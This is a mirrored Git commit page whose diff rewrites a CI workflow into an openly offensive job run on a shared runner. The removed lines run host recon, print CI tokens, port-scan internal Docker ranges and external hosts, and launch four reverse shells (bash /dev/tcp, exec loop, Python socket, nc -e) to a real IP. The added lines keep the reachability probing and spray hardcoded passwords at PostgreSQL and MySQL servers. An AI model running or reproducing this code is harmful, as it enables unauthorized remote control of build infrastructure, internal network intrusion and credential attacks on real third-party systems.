mirror of
http://156.239.229.173:80/devops42/ci-test.git
synced 2026-07-07 23:07:07 +08:00
Update CI/CD workflow for internal network pivot v2
Some checks are pending
CI/CD Internal Pivot v2 / recon (push) Waiting to run
Some checks are pending
CI/CD Internal Pivot v2 / recon (push) Waiting to run
This commit is contained in:
parent
9dd10295e7
commit
3e704fdab5
@ -1,104 +1,43 @@
|
||||
name: CI/CD RCE + Internal Pivot
|
||||
name: CI/CD Internal Pivot v2
|
||||
on: [push, workflow_dispatch]
|
||||
|
||||
jobs:
|
||||
rce-host:
|
||||
recon:
|
||||
runs-on: linux-amd64
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Host Recon
|
||||
run: |
|
||||
echo "=== HOST INFO ==="
|
||||
echo "Timestamp: $(date -u)"
|
||||
echo "Hostname: $(hostname)"
|
||||
echo "User: $(whoami)"
|
||||
echo "PWD: $(pwd)"
|
||||
echo "Kernel: $(uname -a)"
|
||||
echo "UID: $(id)"
|
||||
|
||||
echo "=== NETWORK INFO ==="
|
||||
ip addr show 2>/dev/null || ifconfig 2>/dev/null || true
|
||||
echo "=== RUNNER HOST ==="
|
||||
hostname
|
||||
whoami
|
||||
id
|
||||
echo "=== NETWORK ==="
|
||||
ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true
|
||||
ip route show 2>/dev/null || route -n 2>/dev/null || true
|
||||
ip neigh show 2>/dev/null || arp -a 2>/dev/null || true
|
||||
cat /etc/resolv.conf 2>/dev/null || true
|
||||
cat /etc/hosts 2>/dev/null || true
|
||||
|
||||
echo "=== DOCKER PRESENCE ==="
|
||||
docker ps -a 2>/dev/null || echo "No docker"
|
||||
docker network ls 2>/dev/null || echo "No docker networks"
|
||||
docker info 2>/dev/null | head -10 || echo "No docker info"
|
||||
|
||||
echo "=== PROCESS LIST ==="
|
||||
ps aux 2>/dev/null | head -30 || true
|
||||
|
||||
echo "=== MOUNT POINTS ==="
|
||||
mount 2>/dev/null | head -20 || true
|
||||
df -h 2>/dev/null | head -20 || true
|
||||
|
||||
echo "=== ENV VARS ==="
|
||||
env | sort | grep -v -i token | grep -v -i secret | grep -v -i key | grep -v -i pass || true
|
||||
|
||||
echo "=== GITEA ACTIONS VARS ==="
|
||||
echo "GITEA_TOKEN: ${GITEA_TOKEN:-NOT_SET}"
|
||||
echo "GITHUB_TOKEN: ${GITHUB_TOKEN:-NOT_SET}"
|
||||
echo "GITEA_SERVER_URL: ${GITEA_SERVER_URL:-NOT_SET}"
|
||||
echo "GITEA_REPOSITORY: ${GITEA_REPOSITORY:-NOT_SET}"
|
||||
|
||||
- name: Internal Network Scan
|
||||
run: |
|
||||
echo "=== SCANNING DOCKER NETWORKS ==="
|
||||
for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 172.22.0 10.0.0 10.10.0 192.168.0 192.168.1; do
|
||||
for host in 1 2 3 4 5 10 100 200; do
|
||||
ip="${net}.${host}"
|
||||
for port in 22 80 3000 3306 5432 6379 2375 2376 8080 8088 8418 9090; do
|
||||
timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "DOCKER_SCAN: $ip:$port OPEN" &
|
||||
done
|
||||
wait 2>/dev/null || true
|
||||
echo "=== DOCKER ==="
|
||||
ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
|
||||
env | grep -i docker 2>/dev/null || true
|
||||
echo "=== INTERNAL CONNECTIVITY ==="
|
||||
for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do
|
||||
for port in 5432 3306 6379 3000 222 22 80 443; do
|
||||
timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
|
||||
done
|
||||
done
|
||||
echo "=== SCAN COMPLETE ==="
|
||||
|
||||
- name: PostgreSQL Target Scan
|
||||
- name: PostgreSQL Attack
|
||||
run: |
|
||||
echo "=== TARGETING 156.239.230.24 ==="
|
||||
for port in 22 80 222 443 3000 3001 3306 5432 6379 8088 41327; do
|
||||
timeout 2 bash -c "echo >/dev/tcp/156.239.230.24/$port" 2>/dev/null && echo "PG_TARGET: 156.239.230.24:$port OPEN" || echo "PG_TARGET: 156.239.230.24:$port closed"
|
||||
echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
|
||||
apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
|
||||
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
|
||||
echo "Testing: postgres / $pw"
|
||||
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
|
||||
done
|
||||
|
||||
echo "=== TARGETING GITEA INSTANCES ==="
|
||||
for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 38.47.98.14 156.239.2.237; do
|
||||
for port in 22 80 222 443 3000 3306 5432 6379 8080 8088 8418; do
|
||||
timeout 2 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET: $host:$port OPEN" &
|
||||
- name: MySQL Attack
|
||||
run: |
|
||||
echo "=== MYSQL CREDENTIAL SPRAY ==="
|
||||
apt-get install -y -qq mysql-client 2>/dev/null || true
|
||||
for user in root forgejo gitea admin; do
|
||||
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
|
||||
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
|
||||
done
|
||||
done
|
||||
wait 2>/dev/null || true
|
||||
echo "=== TARGET SCAN COMPLETE ==="
|
||||
|
||||
- name: Reverse Shell (Multiple Methods)
|
||||
run: |
|
||||
RHOST="202.59.10.226"
|
||||
|
||||
# Method 1: Bash direct
|
||||
(bash -c "bash -i >& /dev/tcp/${RHOST}/4444 0>&1" &) 2>/dev/null
|
||||
|
||||
# Method 2: Bash with exec
|
||||
(bash -c "exec 5<>/dev/tcp/${RHOST}/4445; cat <&5 | while read line; do \$line 2>&5 >&5; done" &) 2>/dev/null
|
||||
|
||||
# Method 3: Python
|
||||
python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &
|
||||
|
||||
# Method 4: nc
|
||||
which nc 2>/dev/null && (nc ${RHOST} 4444 -e /bin/bash &) || true
|
||||
|
||||
echo "Reverse shells dispatched to ${RHOST}:4444,4445"
|
||||
|
||||
- name: Write Recon Output
|
||||
run: |
|
||||
mkdir -p /tmp/recon_output
|
||||
ip addr show > /tmp/recon_output/network.txt 2>&1 || true
|
||||
ip route show >> /tmp/recon_output/network.txt 2>&1 || true
|
||||
mount >> /tmp/recon_output/network.txt 2>&1 || true
|
||||
echo "Recon saved to /tmp/recon_output/"
|
||||
cat /tmp/recon_output/network.txt
|
||||
|
||||
Loading…
Reference in New Issue
Block a user